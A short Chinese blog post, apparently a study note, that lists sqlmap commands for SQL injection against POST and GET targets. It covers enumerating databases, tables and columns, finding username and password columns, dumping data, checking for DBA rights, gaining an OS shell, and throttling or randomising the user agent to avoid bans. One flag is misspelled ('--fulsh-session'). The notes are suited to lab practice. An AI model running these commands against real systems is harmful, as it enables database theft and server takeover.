sqlmap的一些简单使用命令

科技资讯 投稿 7500 0 评论

sqlmap的一些简单使用命令

路径

post型注入

*每次使用都要重新抓包,不可以使用旧的数据包

sqlmap -r 目标文件

直接把post.txt拖进去

回车(~ ̄▽ ̄~

得到数据库名和版本

使用 sqlmap.py -r 目标文件 --current-db 爆当前数据库

*使用 sqlmap.py -r 目标文件 --dbs 可得到所有目标ip下的所有数据库

爆数据库下的表名

sqlmap.py -r 目标文件 -D 数据库名 --tables

爆数据库下的指定表名下的所有列名

sqlmap.py -r 目标文件 -D 数据库名 -T 指定表名 --columns

爆数据库下的指定表名下的指定列名下的所有数据

sqlmap.py -r 目标文件 -D 数据库名 -T 指定表名 -C指定列名 --dump

查询那张表有username与password

get型注入

判断是否可以注入及注入类型

python sqlmap.py -u 目标网址/?id=1

查询数据库

python sqlmap.py -u 目标网址/?id=1 --dbs 所有数据库

python sqlmap.py -u 目标网址/?id=1 --current-db 当前数据库

查询数据库下的全部表

python sqlmap.py -u 目标网址/?id=1 -D 数据库名字 --tables

查询指定表下的全部列

python sqlmap.py -u 目标网址/?id=1 -D 数据库名字 -T 指定表名 --columns

查询指定列下的数据

python sqlmap.py -u 目标网址/?id=1 -D 数据库名字 -T 指定表名 -C 列名 --dump

一些使用sqlmap的命令

--random-agent 随机代理 头部

--delay=1 每次探测延时1s 防止访问过快被ban

--count 查看数据的数量 --dump 获取所有数据 脱库

-u http://127.0.0.1/sqliLabs/less-8/ -D security --count

--level 1-5 测试等级1-5 等级越高,检测越详细 等级大于2会检测cookie注入 大于3会检测头注入

--risk sqlmap测试语句的复杂度

--level3 --risk2

--is-dba 查询用户当前权限 dba:true 得到最高权限

--os-shell 直接获得目标的cmd权限

有cmd肯定有dba 有dba不一定有cmd

--fulsh-session 刷新缓存

编程笔记 » sqlmap的一些简单使用命令

赞同 (32) or 分享 (0)
游客 发表我的评论   换个身份
取消评论

表情
(0)个小伙伴在吐槽